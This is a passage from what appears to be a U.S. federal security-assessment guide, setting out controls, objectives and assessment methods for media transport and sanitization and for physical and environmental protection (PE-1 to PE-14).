| Examine: [SELECT FROM: Information system media protection policy; procedures addressing media storage; physical and environmental protection policy and procedures; access control policy and procedures; security plan; information system media; other relevant documents or records]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| MP-5 | MEDIA TRANSPORT |
| Control: The organization protects and controls information system media during transport outside of controlled areas and restricts the activities associated with transport of such media to authorized personnel. | |
| Supplemental Guidance: Information system media includes both digital media (e.g., diskettes, tapes, removable hard drives, flash/thumb drives, compact disks, digital video disks) and non-digital media (e.g., paper, microfilm). A controlled area is any area or space for which the organization has confidence that the physical and procedural protections provided are sufficient to meet the requirements established for protecting the information and/or information system. This control also applies to portable and mobile computing and communications devices with information storage capability (e.g., notebook computers, personal digital assistants, cellular telephones) that are transported outside of controlled areas. Telephone systems are also considered information systems and may have the capability to store information on internal media (e.g., on voicemail systems). Since telephone systems do not have, in most cases, the identification, authentication, and access control mechanisms typically employed in other information systems, organizational personnel exercise extreme caution in the types of information stored on telephone voicemail systems that are transported outside of controlled areas. An organizational assessment of risk guides the selection of media and associated information contained on that media requiring protection during transport. Organizations document in policy and procedures, the media requiring protection during transport and the specific measures taken to protect such transported media. The rigor with which this control is applied is commensurate with the FIPS 199 security categorization of the information contained on the media. An organizational assessment of risk also guides the selection and use of appropriate storage containers for transporting non-digital media. Authorized transport and courier personnel may include individuals from outside the organization (e.g., U.S. Postal Service or a commercial transport or delivery service). | |
| MP-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization identifies personnel authorized to transport information system media outside of controlled areas; | |
| (ii) the organization documents, in policy and procedures, the media requiring protection during transport and the specific measures taken to protect such transported media; | |
| (iii) the organization protects and controls information system media during transport outside of controlled areas; and | |
| (iv) the organization restricts the activities associated with transport of information system media to authorized personnel. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system media protection policy; procedures addressing media transport; physical and environmental protection policy and procedures; access control policy and procedures; security plan; list of organization-defined personnel authorized to transport information system media outside of controlled areas; information system media; information system media transport records; information system audit records; other relevant documents or records]. (M) (H) | |
| MP-5(1) | MEDIA TRANSPORT |
| Control Enhancement: | |
| The organization protects digital and non-digital media during transport outside of controlled areas using [Assignment: organization-defined security measures, e.g., locked container, cryptography]. | |
| Enhancement Supplemental Guidance: Physical and technical security measures for the protection of digital and non-digital media are approved by the organization, commensurate with the FIPS 199 security categorization of the information residing on the media, and consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. Cryptographic mechanisms can provide confidentiality and/or integrity protections depending upon the mechanisms used. | |
| MP-5(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, security measures (e.g., locked container, cryptography) for information system media transported outside of controlled areas; | |
| (ii) the organization protects digital and non-digital media during transport outside of controlled areas using the organization-defined security measures. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system media protection policy; procedures addressing media transport; physical and environmental protection policy and procedures; access control policy and procedures; security plan; information system media transport records; audit records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system media transport responsibilities]. (H) | |
| MP-5(2) | MEDIA TRANSPORT |
| Control Enhancement: | |
| The organization documents, where appropriate, activities associated with the transport of information system media using [Assignment: organization-defined system of records]. | |
| Enhancement Supplemental Guidance: Organizations establish documentation requirements for activities associated with the transport of information system media in accordance with the organizational assessment of risk. | |
| MP-5(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, a system of records for documenting activities associated with the transport of information system media; and | |
| (ii) the organization documents, where appropriate, activities associated with the transport of information system media using the organization-defined system of records. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system media protection policy; procedures addressing media transport; physical and environmental protection policy and procedures; access control policy and procedures; security plan; information system media transport records; audit records; other relevant documents or records]. (M) (H) | |
| MP-5(3) | MEDIA TRANSPORT |
| Control Enhancement: | |
| The organization employs an identified custodian at all times to transport information system media. | |
| Enhancement Supplemental Guidance: Organizations establish documentation requirements for activities associated with the transport of information system media in accordance with the organizational assessment of risk. | |
| MP-5(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs an identified custodian at all times to transport information system media. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system media protection policy; procedures addressing media transport; physical and environmental protection policy and procedures; information system media transport records; audit records; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system media transport responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| MP-6 | MEDIA SANITIZATION AND DISPOSAL |
| Control: The organization sanitizes information system media, both digital and non- digital, prior to disposal or release for reuse. | |
| Supplemental Guidance: Sanitization is the process used to remove information from information system media such that there is reasonable assurance, in proportion to the confidentiality of the information, that the information cannot be retrieved or reconstructed. Sanitization techniques, including clearing, purging, and destroying media information, prevent the disclosure of organizational information to unauthorized individuals when such media is reused or disposed. The organization uses its discretion on sanitization techniques and procedures for media containing information deemed to be in the public domain or publicly releasable, or deemed to have no adverse impact on the organization or individuals if released for reuse or disposed. NIST Special Publication 800-88 provides guidance on media sanitization. The National Security Agency also provides media sanitization guidance and maintains a listing of approved sanitization products at http://www.nsa.gov/ia/government/mdg.cfm. | |
| MP-6.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization identifies information system media requiring sanitization and the appropriate sanitization techniques and procedures to be used in the process; | |
| (ii) the organization sanitizes identified information system media, both paper and digital, prior to disposal or release for reuse; and | |
| (iii) information system media sanitation is consistent with NIST Special Publication 800-88. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system media protection policy; procedures addressing media sanitization and disposal; NIST Special Publication 800-88; media sanitization records; audit records; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system media sanitization responsibilities]. (M) (H) | |
| MP-6(1) | MEDIA SANITIZATION AND DISPOSAL |
| Control Enhancement: | |
| The organization tracks, documents, and verifies media sanitization and disposal actions. | |
| MP-6(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization tracks, documents, and verifies media sanitization and disposal actions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system media protection policy and procedures; media sanitization records; audit records; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system media sanitization responsibilities]. (H) | |
| MP-6(2) | MEDIA SANITIZATION AND DISPOSAL |
| Control Enhancement: | |
| The organization periodically tests sanitization equipment and procedures to verify correct performance. | |
| MP-6(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization periodically tests sanitization equipment and procedures to verify correct performance. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Information system media protection policy; procedures addressing media sanitization and disposal; media sanitization equipment test records; information system audit records; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system media sanitization responsibilities]. (H) |
FAMILY:
Physical and Environmental Protection
| ASSESSMENT PROCEDURE | |
| PE-1 | PHYSICAL AND ENVIRONMENTAL PROTECTION POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, physical and environmental protection policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the physical and environmental protection policy and associated physical and environmental protection controls. | |
| Supplemental Guidance: The physical and environmental protection policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The physical and environmental protection policy can be included as part of the general information security policy for the organization. Physical and environmental protection procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| PE-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents physical and environmental protection policy and procedures; | |
| (ii) the organization disseminates physical and environmental protection policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review physical and environmental protection policy and procedures; and | |
| (iv) the organization updates physical and environmental protection policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with physical and environmental protection responsibilities]. (H) | |
| PE-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the physical and environmental protection policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the physical and environmental protection policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the physical and environmental protection procedures address all areas identified in the physical and environmental protection policy and address achieving policy- compliant implementations of all associated physical and environmental protection controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with physical and environmental protection responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| PE-2 | PHYSICAL ACCESS AUTHORIZATIONS |
| Control: The organization develops and keeps current a list of personnel with authorized access to the facility where the information system resides (except for those areas within the facility officially designated as publicly accessible) and issues appropriate authorization credentials. Designated officials within the organization review and approve the access list and authorization credentials [Assignment: organization-defined frequency, at least annually]. | |
| Supplemental Guidance: Appropriate authorization credentials include, for example, badges, identification cards, and smart cards. The organization promptly removes from the access list personnel no longer requiring access to the facility where the information system resides. | |
| PE-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization identifies areas within the facility that are publicly accessible; | |
| (ii) the organization defines in the security plan, explicitly or by reference, the frequency of review and approval for the physical access list and authorization credentials for the facility and the frequency is at least annually; | |
| (iii) the organization develops and keeps current lists of personnel with authorized access to the facility where the information system resides (except for those areas within the facility officially designated as publicly accessible); | |
| (iv) the organization issues appropriate authorization credentials (e.g., badges, identification cards, smart cards); and | |
| (v) designated officials within the organization review and approve the access list and authorization credentials in accordance with organization-defined frequency. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access authorizations; authorized personnel access list; authorization credentials; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| PE-3 | PHYSICAL ACCESS CONTROL |
| Control: The organization controls all physical access points (including designated entry/exit points) to the facility where the information system resides (except for those areas within the facility officially designated as publicly accessible) and verifies individual access authorizations before granting access to the facility. The organization controls access to areas officially designated as publicly accessible, as appropriate, in accordance with the organization's assessment of risk. | |
| Supplemental Guidance: The organization uses physical access devices (e.g., keys, locks, combinations, card readers) and/or guards to control entry to facilities containing information systems. The organization secures keys, combinations, and other access devices and inventories those devices regularly. The organization changes combinations and keys: (i) periodically; and (ii) when keys are lost, combinations are compromised, or individuals are transferred or terminated. Workstations and associated peripherals connected to (and part of) an organizational information system may be located in areas designated as publicly accessible with access to such devices being appropriately controlled. Where federal Personal Identity Verification (PIV) credential is used as an identification token and token-based access control is employed, the access control system conforms to the requirements of FIPS 201 and NIST Special Publication 800-73. If the token-based access control function employs cryptographic verification, the access control system conforms to the requirements of NIST Special Publication 800-78. If the token-based access control function employs biometric verification, the access control system conforms to the requirements of NIST Special Publication 800-76. | |
| PE-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization controls all physical access points (including designated entry/exit points) to the facility where the information system resides (except for those areas within the facility officially designated as publicly accessible); | |
| (ii) the organization verifies individual access authorizations before granting access to the facility; and | |
| (iii) the organization also controls access to areas officially designated as publicly accessible, as appropriate, in accordance with the organization's assessment of risk. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access control; physical access control logs or records; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with physical access control responsibilities]. (M) (H) | |
| Test: [SELECT FROM: Physical access control capability]. (M) (H) | |
| PE-3.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization uses physical access devices (e.g., keys, locks, combinations, card readers) and/or guards to control entry to facilities containing information systems; | |
| (ii) the organization secures and regularly inventories keys, combinations, and other access devices; and | |
| (iii) the organization changes combinations and keys periodically; and when keys are lost, combinations are compromised, or individuals are transferred or terminated. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access control; physical access control logs or records; maintenance records; records of key and lock combination changes; storage locations for keys and access devices; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Physical access control devices]. (M) (H) | |
| PE-3.3 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the access control system is consistent with FIPS 201 and NIST Special Publication 800-73 (where the federal Personal Identity Verification (PIV) credential is used as an identification token and token-based access control is employed); | |
| (ii) the access control system is consistent with NIST Special Publication 800-78 (where the token-based access control function employs cryptographic verification); and | |
| (iii) the access control system is consistent with NIST Special Publication 800-76 (where the token-based access control function employs biometric verification). | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access control; FIPS 201; NIST Special Publications 800-73, 800-76, and 800-78; information system design documentation; other relevant documents or records]. (L) (M) (H) | |
| PE-3(1) | PHYSICAL ACCESS CONTROL |
| Control Enhancement: | |
| The organization controls physical access to the information system independent of the physical access controls for the facility. | |
| Enhancement Supplemental Guidance: This control enhancement, in general, applies to server rooms, communications centers, or any other areas within a facility containing large concentrations of information system components or components with a higher impact level than that of the majority of the facility. The intent is to provide an additional layer of physical security for those areas where the organization may be more vulnerable due to the concentration of information system components or the impact level of the components. The control enhancement is not intended to apply to workstations or peripheral devices that are typically dispersed throughout the facility and used routinely by organizational personnel. | |
| PE-3(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization identifies specific areas within the facility that, due to the concentration of information system components or the impact level of the components, require additional physical protections over those afforded to the facility as a whole; and | |
| (ii) for an information system identified as requiring additional physical protection or part of a large concentration of information system components, the organization controls physical access to the system independent of the physical access controls for the facility. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access control; physical access control logs or records; information system entry and exit points; list of areas within the facility containing high concentrations of information system components or information system components requiring additional physical protection; other relevant documents or records]. (H) |
| ASSESSMENT PROCEDURE | |
| PE-4 | ACCESS CONTROL FOR TRANSMISSION MEDIUM |
| Control: The organization controls physical access to information system distribution and transmission lines within organizational facilities. | |
| Supplemental Guidance: Physical protections applied to information system distribution and transmission lines help prevent accidental damage, disruption, and physical tampering. Additionally, physical protections are necessary to help prevent eavesdropping or in transit modification of unencrypted transmissions. Protective measures to control physical access to information system distribution and transmission lines include: (i) locked wiring closets; (ii) disconnected or locked spare jacks; and/or (iii) protection of cabling by conduit or cable trays. | |
| PE-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization controls physical access to information system distribution and transmission lines within organizational facilities. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing access control for transmission medium; information system design documentation; facility communications and wiring diagrams; other relevant documents or records]. (H) |
| ASSESSMENT PROCEDURE | |
| PE-5 | ACCESS CONTROL FOR DISPLAY MEDIUM |
| Control: The organization controls physical access to information system devices that display information to prevent unauthorized individuals from observing the display output. | |
| Supplemental Guidance: None. | |
| PE-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization controls physical access to information system devices that display information to prevent unauthorized individuals from observing the display output. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing access control for display medium; facility layout of information system components; actual displays from information system components; other relevant documents or records]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| PE-6 | MONITORING PHYSICAL ACCESS |
| Control: The organization monitors physical access to the information system to detect and respond to physical security incidents. | |
| Supplemental Guidance: The organization reviews physical access logs periodically and investigates apparent security violations or suspicious physical access activities. Response to detected physical security incidents is part of the organization's incident response capability. | |
| PE-6.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization monitors physical access to the information system to detect and respond to physical security incidents. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access monitoring; physical access logs or records; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with physical access monitoring responsibilities]. (M) (H) | |
| Test: [SELECT FROM: Physical access monitoring capability]. (M) (H) | |
| PE-6(1) | MONITORING PHYSICAL ACCESS |
| Control Enhancement: | |
| The organization monitors real-time physical intrusion alarms and surveillance equipment. | |
| PE-6(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization monitors real-time intrusion alarms and surveillance equipment. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access monitoring; intrusion alarm/surveillance equipment logs or records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with physical access monitoring responsibilities]. (H) | |
| Test: [SELECT FROM: Physical access monitoring capability]. (H) | |
| PE-6(2) | MONITORING PHYSICAL ACCESS |
| Control Enhancement: | |
| The organization employs automated mechanisms to recognize potential intrusions and initiate appropriate response actions. | |
| PE-6(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to recognize potential intrusions and initiate appropriate response actions. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing physical access monitoring; information system design documentation; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing physical access monitoring capability]. (H) |
| ASSESSMENT PROCEDURE | |
| PE-7 | VISITOR CONTROL |
| Control: The organization controls physical access to the information system by authenticating visitors before authorizing access to the facility where the information system resides other than areas designated as publicly accessible. | |
| Supplemental Guidance: Government contractors and others with permanent authorization credentials are not considered visitors. Personal Identity Verification (PIV) credentials for federal employees and contractors conform to FIPS 201, and the issuing organizations for the PIV credentials are accredited in accordance with the provisions of NIST Special Publication 800-79. | |
| PE-7.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization controls physical access to the information system by authenticating visitors before authorizing access to the facility where the information system resides other than areas designated as publicly accessible. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing visitor access control; visitor access control logs or records; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with visitor access control responsibilities]. (M) (H) | |
| Test: [SELECT FROM: Visitor access control capability]. (M) (H) | |
| PE-7(1) | VISITOR CONTROL |
| Control Enhancement: | |
| The organization escorts visitors and monitors visitor activity, when required. | |
| PE-7(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization escorts visitors and monitors visitor activity, when required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing visitor access control; visitor access control logs or records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with visitor access control responsibilities]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| PE-8 | ACCESS RECORDS |
| Control: The organization maintains visitor access records to the facility where the information system resides (except for those areas within the facility officially designated as publicly accessible) that includes: (i) name and organization of the person visiting; (ii) signature of the visitor; (iii) form of identification; (iv) date of access; (v) time of entry and departure; (vi) purpose of visit; and (vii) name and organization of person visited. Designated officials within the organization review the visitor access records [Assignment: organization-defined frequency]. | |
| Supplemental Guidance: None. | |
| PE-8.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the frequency of review for visitor access records; | |
(ii) the organization maintains visitor access records to the facility where the information system resides (except for those areas within the facility officially designated as publicly accessible) that includes:
| |
| (iii) designated officials within the organization review the visitor access logs in accordance with organization-defined frequency. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing facility access records; security plan; facility access control records; other relevant documents or records]. (L) (M) (H) | |
| PE-8(1) | ACCESS RECORDS |
| Control Enhancement: | |
| The organization employs automated mechanisms to facilitate the maintenance and review of access records. | |
| PE-8(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated mechanisms to facilitate the maintenance and review of access records. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing facility access records; automated mechanisms supporting management of access records; facility access control logs or records; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibilities for reviewing physical access records]. (H) | |
| PE-8(2) | ACCESS RECORDS |
| Control Enhancement: | |
| The organization maintains a record of all physical access, both visitor and authorized individuals. | |
| PE-8(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization maintains a record of all physical access, both visitor and authorized individuals. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing facility access records; facility access control logs or records; other relevant documents or records]. (H) |
| ASSESSMENT PROCEDURE | |
| PE-9 | POWER EQUIPMENT AND POWER CABLING |
| Control: The organization protects power equipment and power cabling for the information system from damage and destruction. | |
| Supplemental Guidance: None. | |
| PE-9.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization protects power equipment and power cabling for the information system from damage and destruction. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing power equipment and cabling protection; facility housing power equipment and cabling; other relevant documents or records]. (M) (H) | |
| PE-9(1) | POWER EQUIPMENT AND POWER CABLING |
| Control Enhancement: | |
| The organization employs redundant and parallel power cabling paths. | |
| PE-9(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs redundant and parallel power cabling paths. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing power equipment and cabling protection; facility housing power equipment and cabling; other relevant documents or records]. |
| ASSESSMENT PROCEDURE | |
| PE-10 | EMERGENCY SHUTOFF |
| Control: The organization provides, for specific locations within a facility containing concentrations of information system resources, the capability of shutting off power to any information system component that may be malfunctioning or threatened without endangering personnel by requiring them to approach the equipment. | |
| Supplemental Guidance: Facilities containing concentrations of information system resources may include, for example, data centers, server rooms, and mainframe rooms. | |
| PE-10.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization identifies the specific locations within a facility containing concentrations of information system resources (e.g., data centers, server rooms, mainframe rooms); and | |
| (ii) the organization provides, for specific locations within a facility containing concentrations of information system resources, the capability of shutting off power to any information system component that may be malfunctioning or threatened without endangering personnel by requiring them to approach the equipment. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing power source emergency shutoff; emergency shutoff controls or switches; other relevant documents or records]. (M) (H) | |
| PE-10(1) | EMERGENCY SHUTOFF |
| Control Enhancement: | |
| The organization protects the emergency power-off capability from accidental or unauthorized activation. | |
| PE-10(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization protects the emergency power-off capability from accidental or unauthorized activation. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing power source emergency shutoff; emergency shutoff controls or switches; other relevant documents or records]. (H) |
| ASSESSMENT PROCEDURE | |
| PE-11 | EMERGENCY POWER |
| Control: The organization provides a short-term uninterruptible power supply to facilitate an orderly shutdown of the information system in the event of a primary power source loss. | |
| Supplemental Guidance: None. | |
| PE-11.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization provides a short-term uninterruptible power supply to facilitate an orderly shutdown of the information system in the event of a primary power source loss. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing emergency power; uninterruptible power supply documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Uninterruptible power supply]. (H) | |
| PE-11(1) | EMERGENCY POWER |
| Control Enhancement: | |
| The organization provides a long-term alternate power supply for the information system that is capable of maintaining minimally required operational capability in the event of an extended loss of the primary power source. | |
| PE-11(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization provides a long-term alternate power supply for the information system that is capable of maintaining minimally required operational capability in the event of an extended loss of the primary power source. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing emergency power; alternate power supply documentation; alternate power test records; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Alternate power supply]. (H) | |
| PE-11(2) | EMERGENCY POWER |
| Control Enhancement: | |
| The organization provides a long-term alternate power supply for the information system that is self-contained and not reliant on external power generation. | |
| PE-11(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization provides a long-term alternate power supply for the information system that is self-contained and not reliant on external power generation. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing emergency power; alternate power supply documentation; alternate power test records; other relevant documents or records]. | |
| Test: [SELECT FROM: Alternate power supply]. |
| ASSESSMENT PROCEDURE | |
| PE-12 | EMERGENCY LIGHTING |
| Control: The organization employs and maintains automatic emergency lighting that activates in the event of a power outage or disruption and that covers emergency exits and evacuation routes. | |
| Supplemental Guidance: None. | |
| PE-12.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization employs automatic emergency lighting that activates in the event of a power outage or disruption; | |
| (ii) the organization employs automatic emergency lighting that covers emergency exits and evacuation routes; and | |
| (iii) the organization maintains the automatic emergency lighting. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing emergency lighting; emergency lighting documentation; emergency lighting test records; emergency exits and evacuation routes; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with emergency planning responsibilities]. (M) (H) | |
| Test: [SELECT FROM: Emergency lighting capability]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| PE-13 | FIRE PROTECTION |
| Control: The organization employs and maintains fire suppression and detection devices/systems that can be activated in the event of a fire. | |
| Supplemental Guidance: Fire suppression and detection devices/systems include, but are not limited to, sprinkler systems, handheld fire extinguishers, fixed fire hoses, and smoke detectors. | |
| PE-13.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs and maintains fire suppression and detection devices/systems that can be activated in the event of a fire. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing fire protection; fire suppression and detection devices/systems; fire suppression and detection devices/systems documentation; test records of fire suppression and detection devices/systems; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibilities for fire detection and suppression devices/systems]. (M) (H) | |
| PE-13(1) | FIRE PROTECTION |
| Control Enhancement: | |
| The organization employs fire detection devices/systems that activate automatically and notify the organization and emergency responders in the event of a fire. | |
| PE-13(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs fire detection devices/systems that, without manual intervention, notify the organization and emergency responders in the event of a fire. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing fire protection; facility housing the information system; alarm service level agreements; test records of fire suppression and detection devices/systems; fire suppression and detection devices/systems documentation; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibilities for fire detection and suppression devices/systems]. (M) (H) | |
| Test: [SELECT FROM: Simulated fire detection and automated notifications]. (H) | |
| PE-13(2) | FIRE PROTECTION |
| Control Enhancement: | |
| The organization employs fire suppression devices/systems that provide automatic notification of any activation to the organization and emergency responders. | |
| PE-13(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs fire suppression devices/systems that provide automatic notification of any activation to the organization and emergency responders. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing fire protection; fire suppression and detection devices/systems documentation; facility housing the information system; alarm service level agreements; test records of fire suppression and detection devices/systems; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibilities for fire detection and suppression devices/systems]. (M) (H) | |
| Test: [SELECT FROM: Simulated activation of fire suppression devices/systems and automated notifications]. (H) | |
| PE-13(3) | FIRE PROTECTION |
| Control Enhancement: | |
| The organization employs an automatic fire suppression capability in facilities that are not staffed on a continuous basis. | |
| PE-13(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs an automatic fire suppression capability in facilities that are not staffed on a continuous basis. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing fire protection; facility housing the information system; alarm service level agreements; facility staffing plans; test records of fire suppression and detection devices/systems; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibilities for fire detection and suppression devices/systems]. (M) (H) | |
| Test: [SELECT FROM: Simulated activation of fire suppression devices/systems and automated notifications]. (H) |
| ASSESSMENT PROCEDURE | |
| PE-14 | TEMPERATURE AND HUMIDITY CONTROLS |
| Control: The organization regularly maintains, within acceptable levels, and monitors the temperature and humidity within the facility where the information system resides. | |
| Supplemental Guidance: None. | |
